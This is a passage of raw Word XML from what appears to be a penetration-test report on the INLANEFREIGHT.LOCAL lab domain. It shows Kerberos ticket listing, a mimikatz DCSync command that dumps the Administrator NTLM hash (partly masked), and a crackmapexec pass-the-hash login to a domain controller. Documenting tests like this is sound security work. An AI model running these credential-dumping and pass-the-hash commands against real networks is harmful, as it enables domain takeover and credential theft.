              <w:t>Current LogonId is 0:0x256d1d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365DEF8A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CBB49BD" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Cached Tickets: (1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4808B1E0" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="109CAC87" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&gt;     Client: pramirez @ INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65937BD3" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6602441D" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFBED0A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Ticket Flags 0x40e10000 -&gt; forwardable renewable initial pre_authent name_canonicalize</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC19709" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Start Time: 5/15/2022 3:51:35 (local)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63CC1E97" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        End Time:   5/15/2022 13:51:35 (local)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BE7D78" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Renew Time: 5/21/2022 8:21:35 (local)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE02CAD" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Session Key Type: AES-256-CTS-HMAC-SHA1-96</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="691EB8A5" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Cache Flags: 0x1 -&gt; PRIMARY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BCC8D77" w14:textId="2431B02C" w:rsidR="003D5536" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">        Kdc Called:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07E6B125" w14:textId="6A56372D" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Listing Kerberos Tickets in Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D6651" w14:textId="305B1EBE" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t>The tester then utilized this access to perform a DCSync attack and retrieve the NTLM password hash for the built-in Administrator account which led to Enterprise Admin level access over the domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D5536" w14:paraId="4674BCDE" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFAD279" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">PS C:\htb&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.\mimikatz.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27696B69" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="124A73F0" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4E7B07" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D2A843" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A8E01AE" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E36D44" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E3A99E" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com ***/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FEEB2B1" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="134A1528" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>mimikatz # lsadump::dcsync /user:INLANEFREIGHT\administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1A65BE" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[DC] 'INLANEFREIGHT.LOCAL' will be the domain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBDE511" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F099C1B" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[DC] 'INLANEFREIGHT\administrator' will be the user account</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB6BD55" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[rpc] Service  : ldap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338A33BB" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[rpc] AuthnSvc : GSS_NEGOTIATE (9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EF5C35" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[DC] ms-DS-ReplicationEpoch is: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B13DD7" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E9E19C0" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Object RDN           : Administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="424EC0E1" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="624A4164" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>** SAM ACCOUNT **</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55BB885F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="166B85B2" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SAM Username         : Administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F4C7B2" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Account Type         : 30000000 ( USER_OBJECT )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9DBCD4" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6061B73A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Account expiration   :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBF1E57" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Password last change : 2/12/2022 9:32:55 PM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01FBA329" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Object Security ID   : S-1-5-21-1666128402-2659679066-1433032234-500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAF0E2C" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Object Relative ID   : 500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBF8342" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="611B3A37" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Credentials:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31813FAE" w14:textId="214043EE" w:rsidR="003D5536" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  Hash NTLM: e4axxxxxxxxxxxxxxxx1c88c2e94cba2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BFE8350" w14:textId="0BA9A126" w:rsidR="006E291D" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Performing the DCSync Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FCD11" w14:textId="0361B04E" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t>The tester confirmed this access by authenticating to a Domain Controller in the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:t> domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E291D" w14:paraId="40CA891B" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="632C06ED" w14:textId="59142A3A" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo crackmapexec smb 192.168.195.204 -u administrator -H e4axxxxxxxxxxxxxxxx1c88c2e94cba2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B12A44A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
